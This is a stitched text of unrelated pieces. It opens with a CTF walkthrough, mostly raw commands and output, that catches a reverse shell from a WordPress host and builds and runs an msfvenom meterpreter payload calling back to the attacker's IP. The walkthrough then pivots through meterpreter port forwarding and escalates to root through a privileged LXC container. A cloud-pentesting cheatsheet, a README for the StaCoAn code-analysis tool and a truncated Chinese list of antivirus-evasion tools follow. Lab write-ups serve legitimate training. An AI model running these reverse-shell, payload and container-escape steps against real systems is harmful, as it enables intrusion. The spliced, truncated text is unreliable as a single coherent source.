[http://10.10.133.94/wp-admin/plugin-install.php](http://10.10.133.94/wp-admin/plugin-install.php) ``` kali@kali:~/CTFs/tryhackme/For Business Reasons$ nc -lnvp 9001 listening on [any] 9001 ... connect to [10.8.106.222] from (UNKNOWN) [10.10.133.94] 38620 Linux 4e4ae262d6e7 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 GNU/Linux 20:03:31 up 22 min, 0 users, load average: 0.00, 0.14, 0.55 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell www-data@4e4ae262d6e7:/$ whoami whoami www-data www-data@4e4ae262d6e7:/home$ cd /var/www/html cd /var/www/html www-data@4e4ae262d6e7:/var/www/html$ ls ls flag0.txt getip images index.php license.txt lost+found mysql note.txt readme.html start.log start_container.sh test.sh update.log update.sh wordpress_stack.yml wp-activate.php wp-admin wp-blog-header.php wp-comments-post.php wp-config-sample.php wp-config.php wp-content wp-cron.php wp-includes wp-links-opml.php wp-load.php wp-login.php wp-mail.php wp-settings.php wp-signup.php wp-trackback.php xmlrpc.php www-data@4e4ae262d6e7:/var/www/html$ cat flag0.txt cat flag0.txt ya7ooShiivagaipi ``` ``` www-data@4e4ae262d6e7:/var/www/html$ cat wordpress_stack.yml cat wordpress_stack.yml version: '3.1' services: wordpress: image: wordpress:php7.2-apache restart: always ports: - 80:80 environment: WORDPRESS_DB_HOST: db WORDPRESS_DB_USER: wpdbuser WORDPRESS_DB_PASSWORD: Ceixahz5 WORDPRESS_DB_NAME: wpdb volumes: - /data:/var/www/html/ db: image: mysql:5.7 restart: always environment: MYSQL_DATABASE: wpdb MYSQL_USER: wpdbuser MYSQL_PASSWORD: Ceixahz5 MYSQL_RANDOM_ROOT_PASSWORD: '1' volumes: - /data/mysql:/var/lib/mysql volumes: wordpress: db: ``` ``` msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.8.106.222 LPORT=9002 -f elf > shell.elf ``` ``` kali@kali:~/CTFs/tryhackme/For Business Reasons$ nc -lnvp 9001 listening on [any] 9001 ... connect to [10.8.106.222] from (UNKNOWN) [10.10.133.94] 38664 Linux 4e4ae262d6e7 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 GNU/Linux 21:06:12 up 1:25, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell www-data@4e4ae262d6e7:/$ clear clear TERM environment variable not set. www-data@4e4ae262d6e7:/$ cd /tmp cd /tmp www-data@4e4ae262d6e7:/tmp$ ls ls nc netcat pear shell.elf tmp www-data@4e4ae262d6e7:/tmp$ ./shell.elf ./shell.elf ``` ``` kali@kali:~/CTFs/tryhackme/For Business Reasons$ sudo msfconsole -q [sudo] password for kali: msf5 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp payload => linux/x64/meterpreter_reverse_tcp msf5 exploit(multi/handler) > options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (linux/x64/meterpreter_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > set LHOST tun0 LHOST => 10.8.106.222 msf5 exploit(multi/handler) > set LPORT 9002 LPORT => 9002 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.8.106.222:9002 [*] Meterpreter session 1 opened (10.8.106.222:9002 -> 10.10.133.94:48290) at 2020-10-15 23:07:43 +0200 meterpreter > route IPv4 network routes =================== Subnet Netmask Gateway Metric Interface ------ ------- ------- ------ --------- 0.0.0.0 0.0.0.0 172.18.0.1 0 eth2 10.0.0.0 255.255.255.0 0.0.0.0 0 eth1 10.255.0.0 255.255.0.0 0.0.0.0 0 eth0 172.18.0.0 255.255.0.0 0.0.0.0 0 eth2 No IPv6 routes were found. meterpreter > portfwd -l 22 -p 22 -r 172.18.0.1 Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS: -L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to. -R Indicates a reverse port forward. -h Help banner. -i <opt> Index of the port forward entry to interact with (see the "list" command). -l <opt> Forward: local port to listen on. Reverse: local port to connect to. -p <opt> Forward: remote port to connect to. Reverse: remote port to listen on. -r <opt> Forward: remote host to connect to. meterpreter > portfwd add -l 22 -p 22 -r 172.18.0.1 [*] Local TCP relay created: :22 <-> 172.18.0.1:22 meterpreter > ``` ``` kali@kali:~/CTFs/tryhackme/For Business Reasons$ ssh sysadmin@localhost The authenticity of host 'localhost (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:YWh6/YCN0RzHZZK5fdUZ2EB9I2CQSoW4XAZ5/V+CYUc. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts. sysadmin@localhost's password: Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 263 packages can be updated. 181 updates are security updates. Last login: Sun Aug 9 15:30:13 2020 from 192.168.191.131 sysadmin@ubuntu:~$ ls flag1.txt sysadmin@ubuntu:~$ cat flag1.txt osh4loNi sysadmin@ubuntu:~$ ``` ``` sysadmin@ubuntu:~$ wget http://10.8.106.222/alpine-v3.12-x86_64-20201015_2323.tar.gz --2020-10-15 17:24:37-- http://10.8.106.222/alpine-v3.12-x86_64-20201015_2323.tar.gz Connecting to 10.8.106.222:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3183826 (3.0M) [application/gzip] Saving to: ‘alpine-v3.12-x86_64-20201015_2323.tar.gz’ alpine-v3.12-x86_6 100%[=============>] 3.04M 3.27MB/s in 0.9s 2020-10-15 17:24:38 (3.27 MB/s) - ‘alpine-v3.12-x86_64-20201015_2323.tar.gz’ saved [3183826/3183826] sysadmin@ubuntu:~$ lxc image import ./alpine-v3.12-x86_64-20201015_2323.tar.gz --alias myimage Image imported with fingerprint: 7924e55c121c96464757d79c0782608607a759a548a4b9f9d58feeb6857500a4 sysadmin@ubuntu:~$ lxc image list +---------+--------------+--------+-------------------------------+--------+--------+------------------------------+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE | +---------+--------------+--------+-------------------------------+--------+--------+------------------------------+ | myimage | 7924e55c121c | no | alpine v3.12 (20201015_23:23) | x86_64 | 3.04MB | Oct 15, 2020 at 9:25pm (UTC) | +---------+--------------+--------+-------------------------------+--------+--------+------------------------------+ sysadmin@ubuntu:~$ lxc init myimage alpine -c security.privileged=true Creating alpine sysadmin@ubuntu:~$ lxc config device add alpine mydevice disk source=/ path=/mnt/root recursive=true Device mydevice added to alpine sysadmin@ubuntu:~$ lxc start alpine sysadmin@ubuntu:~$ lxc exec alpine /bin/sh ~ # whoami root ~ # cd /root ~ # ls ~ # cd /mnt/root/ /mnt/root # cd root/ /mnt/root/root # cat root.txt Kainiy1Onoonoh3j ``` 1. What is flag 0? `ya7ooShiivagaipi` 2. What is the user flag? `osh4loNi` 3. What is the root flag? `Kainiy1Onoonoh3j`
# Pentesting the cloud cheatsheet * [General](#General) * [Scaning tools](#Scanning-tools) * [Recon \ OSINT](/OSINT.md#Cloud) * [Initial access attacks](initial-access-attacks.md) * [Cloud Services](readme.md) * [Azure](azure/readme.md) * [Amazon Web Services](aws/readme.md) * [Google Cloud](gc/readme.md) # General - Google Cloud Platform != Google Workspace - Google Cloud Platform provides cloud services. Iaas, Paas, Saas - Google Workspace (G-suite) provides business applications. Saas, Idaas - Azure != Microsoft 365 != Azure AD - Azure AD is the Identity Management part of Azure. This is where all the users are. - Azure provides cloud services. Iaas, Paas, Saas - Microsoft365 provides business applications. Saas, Idaas - Google Workspace and Microsoft 365 are productivity suites - Rules of engagement - Azure https://www.microsoft.com/en-us/msrc/pentest-rules-of-engagement - AWS: https://aws.amazon.com/security/penetration-testing/ - GCP https://support.google.com/cloud/answer/6262505?hl=en - Enumerate host https://github.com/dafthack/HostRecon ## Scanning tools ### Enumeration - AWS - https://github.com/carnal0wnage/weirdAAL ### Vulnerability scanning - Scoutsuite - https://github.com/nccgroup/ScoutSuite - Scans AWS, Azure, GCP, Alibaba cloud, Oracle cloud - Scoutsploit - https://github.com/cloudsploit/scans - Scans AWS, Azure, GCP, Oracle - Kics - https://github.com/Checkmarx/kics - Terraform, Ansible, Docker etc ### Privesc scanning - GCP - https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/PrivEscScanner - AWS - https://github.com/RhinoSecurityLabs/pacu - Azure - https://github.com/Azure/Stormspotter - General - https://github.com/cyberark/SkyArk
![StaCoAn header](resources/header_stacoan-01.png) # StaCoAn ![Issues badge](https://img.shields.io/github/issues/vincentcox/StaCoAn.svg) ![License badge](https://img.shields.io/github/license/vincentcox/StaCoAn.svg) ![status](https://img.shields.io/badge/status-alpha-red.svg) ![Travis](https://api.travis-ci.org/vincentcox/StaCoAn.svg?branch=master) <h1><b>Not maintained anymore!</b></h2> Will be archived soon. StaCoAn is a __crossplatform__ tool which aids developers, bugbounty hunters and ethical hackers performing [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) on mobile applications\*. This tool will look for interesting lines in the code which can contain: * Hardcoded credentials * API keys * URL's of API's * Decryption keys * Major coding mistakes This tool was created with a big focus on usability and graphical guidance in the user interface. For the impatient ones, grab the download on the [releases page](https://github.com/vincentcox/StaCoAn/releases). <p style="font-size: 0.6em"> &ast;: note that currently only apk files are supported, but ipa files will follow very shortly. </p> An example report can be found [here](https://github.com/vincentcox/StaCoAn/raw/master/resources/example-report.zip). ## Table of Contents <!-- TOC depthFrom:2 depthTo:6 withLinks:1 updateOnSave:1 orderedList:0 --> - [Table of Contents](#table-of-contents) - [Features](#features) - [Looting concept](#looting-concept) - [Wordlists](#wordlists) - [Filetypes](#filetypes) - [Responsive Design](#responsive-design) - [Limitations](#limitations) - [Getting Started](#getting-started) - [From the releases](#from-the-releases) - [Docker](#docker) - [From source](#from-source) - [Building the executable](#building-the-executable) - [Windows](#windows) - [mac](#mac) - [Linux](#linux) - [Contributing](#contributing) - [Roadmap](#roadmap) - [Authors & Contributors](#authors-contributors) - [Top contributors](#top-contributors) - [License](#license) - [Acknowledgments](#acknowledgments) <!-- /TOC --> ## Features The concept is that you drag and drop your mobile application file (an .apk or .ipa file) on the StaCoAn application and it will generate a visual and portable report for you. You can tweak the settings and wordlists to get a customized experience. The reports contain a handy tree viewer so you can easily browse trough your decompiled application. ![Mockup application ](resources/mockup_screenshot.png) ### Looting concept The _Loot Function_ let you 'loot' (~bookmark) the findings which are of value for you and on the loot-page you will get an overview of your 'loot' raid. The final report can be exported to a zip file and shared with other people. ### Wordlists The application uses wordlists for finding interesting lines in the code. Wordlists are in the following format: ``` API_KEY|||80||| This contains an API key reference (https|http):\/\/.*api.*|||60||| This regex matches any URL containing 'api' ``` __Note that these wordlists support [regex](https://www.regular-expressions.info/examples.html) entries.__ In the `exclusion_list.txt` you can define exclusions (if you have for some reason to much findings): ``` (https|http):\/\/.*api.*|||"res","layout"||| Like previously, note that "res","layout" resembles the path (https|http):\/\/.*api.*|||||| To exclude everywhere ``` ### Filetypes Any source file will be processed. This contains `'.java', '.js', '.html', '.xml',...` files. Database-files are also searched for keywords. The database also has a table viewer. ![database](resources/screenshot_database.png) ### Responsive Design The reports are made to fit on all screens. ![](resources/responsive.gif) ## How does the tool works? ![Pipeline tool](resources/pipeline.png) ## Limitations This tool will have trouble with [obfuscated](https://en.wikibooks.org/wiki/Introduction_to_Software_Engineering/Tools/Obfuscation) code. If you are a developer try to compile without obfuscation turned on before running this tool. If you are on the offensive side, good luck bro. ## Getting Started ### From the releases If you want to get started as soon as possible, head over to the [releases page](https://github.com/vincentcox/StaCoAn/releases) and download the executable or archive which corresponds to your operating system. If you have downloaded the release zip file, extract this. On Windows you can just double click the executable. It will open in server mode and you can just drag and drop your mobile applications in the webinterface. ![Windows 1 click](resources/windows-1-click.gif) On Mac and Linux you can just run it from the terminal without arguments for the server-mode. ``` ./stacoan ``` Drag and drop this file onto the executable. Or you can specify an apk-file to run it without the server-mode: ``` ./stacoan -p test-apk.apk ``` The report will be put inside a folder with a name corresponding to the apk. ### Docker ``` cd docker ``` ``` docker build . -t stacoan ``` _Make sure that your application is at the location `/yourappsfolder`._ ``` docker run -e JAVA_OPTS="-Xms2048m -Xmx2048m" -p 8888:8888 -p 7777:7777 -i -t stacoan ``` Drag and drop your application via: http://127.0.0.1:7777. ### From source ``` git clone https://github.com/vincentcox/StaCoAn/ ``` ``` cd StaCoAn/src ``` Make sure that you have pip3 installed: ``` sudo apt-get install python3-pip ``` Install the required python packages: ``` pip3 install -r requirements.txt ``` Run StaCoAn via commandline: ``` python3 stacoan.py -p yourApp.apk ``` __Or__ if you rather use the drag and drop interface: ``` python3 stacoan.py ``` ### Building the executable Make sure that you are in the `src` folder. ``` cd src ``` Install [PyInstaller](http://www.pyinstaller.org/): ``` pip3 install pyinstaller ``` #### Windows PyInstaller can't handle subfolders with code, therefore we need to put the code in one folder. ``` sed -i 's/from helpers./from /g' helpers/* sed -i 's/from helpers./from /g' stacoan.py sed -i 's/os.path.join(parentdir, "config.ini")/"config.ini"/g' helpers/logger.py cp helpers/* ./ || :; ``` Build stacoan: ``` python3 -m PyInstaller stacoan.py --onefile --icon icon.ico --name stacoan --clean ``` #### mac PyInstaller can't handle subfolders with code, therefore we need to put the code in one folder. ``` # Note the ''-> this is because sed syntax is different on mac. sed -i '' 's/from helpers./from /g' helpers/* sed -i '' 's/from helpers./from /g' stacoan.py sed -i '' 's/os.path.join(parentdir, "config.ini")/"config.ini"/g' helpers/logger.py cp helpers/* ./ || :; ``` Build stacoan: ``` python3 -m PyInstaller stacoan.py --onefile --icon icon.ico --name stacoan --clean ``` #### Linux PyInstaller can't handle subfolders with code, therefore we need to put the code in one folder. ``` sed -i 's/from helpers./from /g' helpers/* sed -i 's/from helpers./from /g' stacoan.py sed -i 's/os.path.join(parentdir, "config.ini")/"config.ini"/g' helpers/logger.py cp helpers/* ./ || :; ``` Build stacoan: ``` python3 -m PyInstaller stacoan.py --onefile --icon icon.ico --name stacoan --clean ``` ## Contributing This entire program's value is depending on the wordlists it is using. In the end, the final result is what matters. It is easy to build a wordlist (in comparison to writing actual code), but it has the biggest impact on the end result. You can help the community the most with making wordlists. If you want an easy way to post your idea's, head over to: http://www.tricider.com/brainstorming/2pdrT7ONVrB. From there you can add ideas for entries in the wordlist. Improving the code is also much appreciated. If the contribution is high enough, you will be mentioned in the `authors` section. ### Roadmap - [ ] Make IPA files also work with this program - [ ] Make DB matches loot-able - [x] Better logging (cross platform) - [x] Docker optimalisation - [x] Use server to upload files (apk's, ipa's) and process them - [x] Exception list for ignoring findings in certain folders. For example ignoring `http` in `res/layout` and in general `http://schemas.android.com/apk/res/android` - [x] Make a cleaner file structure of this project ## Authors & Contributors <table> <tr> <th><center>Project Creator</center></th> </tr> <tr> <td> <p align="center"><img src="resources/authors/vincentcox.jpg" alt="Vincent Cox" width="200px"/></p> </td> </tr> <tr> <td> <div align="center"> <a href="https://www.linkedin.com/in/ivincentcox/"> <img src="https://cdnjs.cloudflare.com/ajax/libs/foundicons/3.0.0/svgs/fi-social-linkedin.svg" alt="Linkedin" width="40px"/> </a> <a href="https://twitter.com/vincentcox_be"> <img src="https://cdnjs.cloudflare.com/ajax/libs/foundicons/3.0.0/svgs/fi-social-twitter.svg" alt="Twitter" width="40px"/> </a> <a href="https://vincentcox.com"> <img src="https://cdnjs.cloudflare.com/ajax/libs/foundicons/3.0.0/svgs/fi-web.svg" alt="Website" width="40px"/> </a> </div> </td> </tr> </table> ### Top contributors <a href="https://github.com/Kevin-De-Koninck"><img src="resources/authors/Kevin-De-Koninck.png" width="100px"></a> <a href="https://github.com/BBerastegui"><img src="resources/authors/BBerastegui.png" width="100px"></a> <a href="https://github.com/adi0x90"><img src="resources/authors/adi0x90.png" width="100px"></a> <a href="https://github.com/Ayowel"><img src="resources/authors/Ayowel.png" width="100px"></a> ## License The following projects were used in this project: * [Materialize CSS](http://materializecss.com/): Materialize, a CSS Framework based on Material Design. Used for the general theme of the reports. * [PRISMJS](http://prismjs.com/): Lightweight, robust, elegant syntax highlighting. Used for the code markup * [JADX](https://github.com/skylot/jadx): Dex to Java decompiler. Used for decompiling .apk files\*. * [Fancytree](https://github.com/mar10/fancytree): jQuery tree view / tree grid plugin. Used in the tree-view of the reports. * [fontawesome](http://fontawesome.io/): Font Awesome, the iconic font and CSS framework. Used for some icons. * [JSZip](https://stuk.github.io/jszip/): JSZip is a javascript library for creating, reading and editing .zip files, with a lovely and simple API. * [FileSaver](https://github.com/eligrey/FileSaver.js/): An HTML5 saveAs() FileSaver implementation. Used in the JSZip library. All of these projects have their corresponding licenses. Please respect these while you are modifying and redistributing this project. <p style ="font-size: 0.6em"> &ast;: the binary is included in this project. If the dev's from JADX are not comfortable with this, feel free to contact me about this so we can find a solution. </p> ## Acknowledgments * [Kevin De Koninck](https://github.com/Kevin-De-Koninck): Git master and senpai of patience with my learning process in [pep8](https://www.python.org/dev/peps/pep-0008/). * [brakke97](https://twitter.com/skeltavik): He taught me how to hack mobile applications. This project would never exist without him. * [Aditya Gupta](https://twitter.com/adi1391): Awesome dude, really. Just keep him away from your IoT fridge or coffeemachine. Check out his [website](https://www.attify-store.com/) if you are into IoT hacking. Also have a look at his course ["Advanced Android and iOS Hands-on Exploitation"](https://courses.securityschool.io/advanced-android-and-ios-hands-on-exploitation). I'm sure many future improvements in this tool will be based on ideas and techniques used during his course. * [Quintenvi](https://twitter.com/quintenvi): He taught me alot, also non-hacking things. * [c4b3rw0lf](https://twitter.com/c4b3rw0lf): The awesome dude behind the [VulnOS series](https://www.vulnhub.com/series/vulnos,36/). * [MacJu89](https://twitter.com/MacJu89): infra & XSS senpai Many more should be listed here, but I can't list them all.
# [所有收集类项目](https://github.com/alphaSeclab/all-my-collection-repos) # Anti-AV - 跟杀软和免杀有关的资料,当前包括200+工具和1300+文章,根据功能进行了粗糙的分类 - 相关内容,在有关**Payload、Shellcode、混淆、PowerShell、隐写、注入、远控**收集里 - [English Version](https://github.com/alphaSeclab/anti-av/blob/master/Readme_en.md) # 目录 - [veil](#13fd86f84443937a29340957140ce48a) -> [(5)工具](#3a2c068e615306b2557444d3ff0fd8d4) [(41)文章](#fb91f19c332b7713b5961026e7f8d9f0) - [ASWCrypter](#2b42bd6443319711cc12f2f6e50ddbfe) -> [(1)工具](#8f0b8198835e2c90692ec1376e30a689) - [AVIator](#4a1d607241b8f21b06664347f39a339c) -> [(1)工具](#10901ea9fcdafae3e4c34da73b435cee) [(1)文章](#49b348e0e13fd9ebff7dcdaafe2c2b9b) - [Avet](#a0849be5404b3ed7c789e979cc3b1382) -> [(2)工具](#27953172d38e0d8a401b0e614b9287ec) [(14)文章](#90c144f7f5eed8792ccab8c9e602a403) - [Avoidz](#0ce51643a8accfa61b1920747b92347b) -> [(1)工具](#dd3084ae08dd36d458ad17df487c2976) - [BDF](#0f9a694410214f0e09caaa0132968656) -> [(2)工具](#2b8c4e72ae18bc130b5cc45b22882d85) [(13)文章](#9dbfd4fdbf6435ac9913a1d83c5c3c7c) - [CACTUSTORCH](#b3a06244641c573c12d076de5cedb37a) -> [(3)工具](#e0cb098391fd9ed90121e2916b9d6e1f) [(6)文章](#1a5f76b8dc23b9db07ada5e84395e918) - [DKMC](#cef3b934de15377654f46f1e1ac60b34) -> [(1)工具](#46b192d2a3ba0747e84e2aaef1b0dd9e) [(3)文章](#1125d9d5b37b5a78bd067fbe3ffbc595) - [GreatSCT](#61bd903441458d02b5f29e0c7c88772c) -> [(1)工具](#8db87bb7235bd7bbd5c172d162d76f9a) [(2)文章](#af1bbce8299e80c5d895279059d5f2e8) - [Green-Hat-Suite](#3c299dae55724965657ddae00d58f445) -> [(1)工具](#fedf1b28a3eaafa5e1c7195622961dac) - [HERCULES](#374c9d9255645a308f45c5861c90982b) -> [(1)工具](#bbaceff782da895cb6436580b9faf348) [(8)文章](#ac892582920f6b3faa83996fe7d32f7c) - [Python-Rootkit](#c88f6e7d1b8e5fbdc160f547436a1765) -> [(1)工具](#53f087810d39f686bc430fc16b4b57cf) - [SharpShooter](#dc799b61ee105a1d1821f79483e19ae6) -> [(1)工具](#0af225b9b7d5680725f82edddbfde244) [(18)文章](#2990cb241fd645b9d3fca7617004e98d) - [SpookFlare](#0ea62b3f2d6a28ea5fca3b040430dbc9) -> [(1)工具](#910a7d5c31f4d0ecf0bf54c6e2420c56) [(2)文章](#411fee0ed40668884479e464bf994ba4) - [TheFatRat](#2844bde3d954b4af180d188082fea3ec) -> [(2)工具](#9a8cd34cea64c0825e53fcdda0c122e4) [(8)文章](#dd5dea07a5d0415b767d925d04e99e0f) - [Venom](#2f025b72723b0bad9b30bb79ed3f47ae) -> [(6)工具](#52dcc58dcf9e0e09c5f9d2fc3cc64f72) [(8)文章](#1131eb654d689690d462d86a3ffb2f1a) - [Winpayloads](#c1d31bd6ecf78f7a3fc7fc52ac202d95) -> [(1)工具](#453757cab7a1b573f10f088f8ccbed81) [(4)文章](#665371c5a04efeeb3540ec331d75b198) - [nps_payload](#78d4960c1617befde6be1c374e5e224e) -> [(2)工具](#bd2624d62630d556efa8f431429f3a28) [(3)文章](#1c6d137ac85ae2d158e343ba1327ffde) - [zirikatu](#fedbeafa34f02f951f0792a799d4073d) -> [(1)工具](#f3fb6776c2d0d008630311e19e9ba7c1) [(1)文章](#733a0143baef08c6229e70dda5b4fa65) - [unicorn](#3d7c6c6fc7f0bd776051bee516d94d0f) -> [(1)工具](#bc86fda39a6ec0976b23b66f79308389) - [Shellter](#619a40fa2c43bfd68c1449c7481c42db) -> [(17)文章](#b0c0f53e7fa8ab994270778efe65f413) - [dr0p1t](#68856cb6cd8a71236b7ab0dd8ae6e4f3) -> [(1)工具](#a338777a3909deef427bc71b1e2c31aa) [(3)文章](#05cbac684baf2b4169f77fe3b3001ce6) - [phantom](#03faa45aa2511d31e470556f664c3dbb) -> [(1)工具](#f6fa26843c6cc22c7277b9f609bb5067) [(1)文章](#eaaefa10905a4a70b7638dc0a3888576) - [morphaes](#1e6a9c93f0c18239195ee1550e8c8286) -> [(1)工具](#b2c88539436be2829d0a004f959c88ca) [(1)文章](#b0f82b4b4cfbc920f9696fba1b2ef219) - [unibyav](#7eb9d59bc55e5f016a3cebb83d1a1b92) -> [(1)工具](#989d2090c76a62641b74bc2b1b8d0ae7) - [armor](#8bc66a23c82b90dacd110a357b88ea61) -> [(1)工具](#3ada1997ce6a96c892f7ab3fa8dad2ec) - [foolav](#517b0aeab5f2cd945f94f91e8974cf5a) -> [(2)工具](#e5b6342fb680c4bd510d354bf7980dca) [(2)文章](#7d46cbb4cb861c45336127542614b679) - [Inception](#5d6c4ac2fad929e20c0078b587498fe3) -> [(1)工具](#ffc28f955ef67e69a7302028e7fe5c7e) - [CarbonCopy](#376fa2db1df60456ca1de20b473dda6f) -> [(1)工具](#c4b468e647a6c596f085d35be9c954cf) - [metasploitavevasion](#8545aec3222685f7ade02e2b46d08b9c) -> [(1)工具](#56cc20e65680f66c92c00965803e9c37) - [SideStep](#4bd9e808211303a5ba0ae1ad0dd9479e) -> [(1)工具](#8813c1723abf0617203a5194679eac5a) [(1)文章](#013f4c8152b842e7b69245a620ca70e4) - [nativepayload_dns](#888ee9daabdbd703448f8910aa9704e2) -> [(1)工具](#f5adbcc74fc6e3a0b6b8075e08029d53) - [HackTheWorld](#b78301af3e251368517e446160caa268) -> [(1)工具](#e32647912325352a4af7f8e0b7079218) - [Salsa-tools](#f3473296bad376d23c4c7ee3e4aef378) -> [(1)工具](#8cf63337df4bb46d78ecef66db7f32ba) - [mcreator](#c2951eccbf61918b64cfe866f631482c) -> [(1)工具](#60b14a1abbbd681bd496f0ba28115f1b) - [杀毒软件](#6d54eff12d6ae09b0713e047857c3a4d) - [ClamAV](#0f79ac3b032081b26dbcb3144c795c1d) -> [(18)工具](#00cbab201c6762bbcae7c84b7d0899c1) [(45)文章](#50a64cc4d87a6d9a7a42502573dd36bb) - [phpmussel](#23f0535e20d7568cb2148058d4d0eec7) -> [(1)工具](#df50a8b098bb9d9705d23a1c5aee1b9d) - [AntiSpy](#d2b49dd7f9e44ce9bebaa9a2d10fb418) -> [(1)工具](#5b8aed4a3f150a46044fcbb9303bbe07) [(2)文章](#0dac6b8f6f53c74872ba8abc870c5786) - [TinyAntivirus](#266b4e495fed809aebd810e9179943bc) -> [(1)工具](#b5fda8d31849edf53b8c3c683f30f990) - [yourav](#e14845ece905066b4158a157822a5b46) -> [(1)工具](#ee1cb60a806b81ce73708f6dbd2c5ab6) - [Armadito](#c0262ea14af5f0a32ea77c42f74d9083) -> [(3)工具](#412655e126f176b7d826ae47f4d709bd) - [kicomav](#f5ea509928f78d22baaf8b7d2d83b1c1) -> [(1)工具](#ae0cbebfda20355ed559439425b8bb53) - [(7) 工具](#5405d662fd54f801c7210a7bda946945) - [白利用](#1bfd82f11c1dfbbe3bc02196944ffac5) - [(11) 文章-白利用](#7d2569935e9e48ed6bbe0caca9efc76e) - [(3) 文章-白加黑](#f12f806947d9d9c0cc78e8d5af783bee) - [(40) 文章-LOLBins](#3893c1696e85d78880d012ed01d85982) - [SysWhispers](#e96af0ca0a80b6ab957e1a9b3bbfaa70) -> [(1)文章](#d731b11009dd22d3df9458b4d43e4550) - [工具](#168d42230cc287e1baccc651367d3e9b) - [(2) 资源收集](#93ec152efed1e1ec1343cfdac7988c08) - [(120) 新添加](#f9687c608e750c19c2f8190158a63333) - [文章](#43ab3b50407757fdb5a2b9cb2c3e4cad) - [(291) 新添加](#eb021f60cbd17bdf75a241a68fa0986e) - [Msfvenom](#d9b2e74a805ed64182b5784b7fa2a4fb) - [(10) Msfvenom](#5a642a096788ca0c11bef126b533c6ad) - [(7) Youtube](#7730a4447da61926c4f582db6ee96b32) - [(7) hackingarticles](#e59f6ecd26ef69cefe42e7362af6aa0f) - [(346) AntiVirus](#fd930c71d4f8d16ee4a993e04e618394) - [(360) 杀软/杀毒/杀](#4e403284d24b06f1830ddbe67a132408) - [(7) 远控免杀从入门到实践](#b2d27225ff6394904396a2594c6df5e3) - [(18) 恶意代码](#b661c2ec8b7476a5c8e3937213995385) - [(10) webshell](#e92db1d2247da3a2fd0fce167afbac6a) # <a id="13fd86f84443937a29340957140ce48a"></a>veil *** ## <a id="3a2c068e615306b2557444d3ff0fd8d4"></a>工具 - [**1900**星][4m] [Py] [veil-framework/veil](https://github.com/veil-framework/veil) 生成免杀的Metasploit Payload - [**1515**星][11d] [Py] [veil-framework/veil-evasion](https://github.com/Veil-Framework/Veil-Evasion) 一种用于生成metasploit有效负载的工具,它绕过了常用的反病毒解决方案 - [**75**星][5y] [PS] [cheetz/powertools](https://github.com/cheetz/powertools) Veil's PowerTools are a collection of PowerShell projects with a focus on offensive operations. - [**73**星][8m] [Py] [veil-framework/veil-catapult](https://github.com/veil-framework/veil-catapult) Veil Catapult is no longer supported - [**63**星][5y] [Py] [veil-framework/veil-ordnance](https://github.com/veil-framework/veil-ordnance) Veil-Ordnance is a tool designed to quickly generate MSF stager shellcode *** ## <a id="fb91f19c332b7713b5961026e7f8d9f0"></a>文章 - 2019.10 [Cooper] [Piercing The Veil: Server Side Request Forgery Attacks On Internal Networks - Alyssa Herrera](https://www.youtube.com/watch?v=7J-5mTc2e8A) - 2019.01 [freebuf] [Kali Linux中的VEIL Framework绕过防病毒软件实验](https://www.freebuf.com/articles/system/193240.html) - 2019.01 [sans] [The State of the Veil Framework](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1493862822.pdf) - 2018.09 [microsoft] [Office VBA + AMSI: Parting the veil on malicious macros](https://cloudblogs.microsoft.com/microsoftsecure/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/) - 2018.09 [microsoft] [Office VBA + AMSI: Parting the veil on malicious macros](https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/) - 2018.06 [NetworkHeros] [Ethical Hacking (CEH v10) : Undetectable payload with veil | Hack any Windows 10](https://www.youtube.com/watch?v=BGePJe-ZiTE) - 2018.05 [cyberarms] [Anti-Virus Bypass with Veil on Kali Linux](https://cyberarms.wordpress.com/2018/05/29/anti-virus-bypass-with-veil-on-kali-linux/) - 2018.05 [HackerSploit] [Veil-Evasion - How To Generate Undetectable Payloads | Antivirus Bypass](https://www.youtube.com/watch?v=iz1twCSJZyo) - 2018.04 [freebuf] [Veil-Evasion+PyJoiner捆绑两个EXE免杀思路分享](http://www.freebuf.com/sectool/164382.html) - 2018.04 [alyssa] [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/p/c358fd5e249a) - 2018.03 [NDSSSymposium] [NDSS2018 Veil: Private Browsing Semantics Without Browser-side Assistance](https://www.youtube.com/watch?v=gWrxP6fgYTA) - 2017.06 [UltraHacks] [Veil Evasion successful Installation on Kali Linux 3.0](https://www.youtube.com/watch?v=y2dlHeEFZNE) - 2017.03 [n0where] [Antivirus Evasion Framework: Veil Framework](https://n0where.net/antivirus-evasion-framework-veil-framework) - 2017.03 [fireeye] [AntiVirus Evasion Reconstructed – Veil 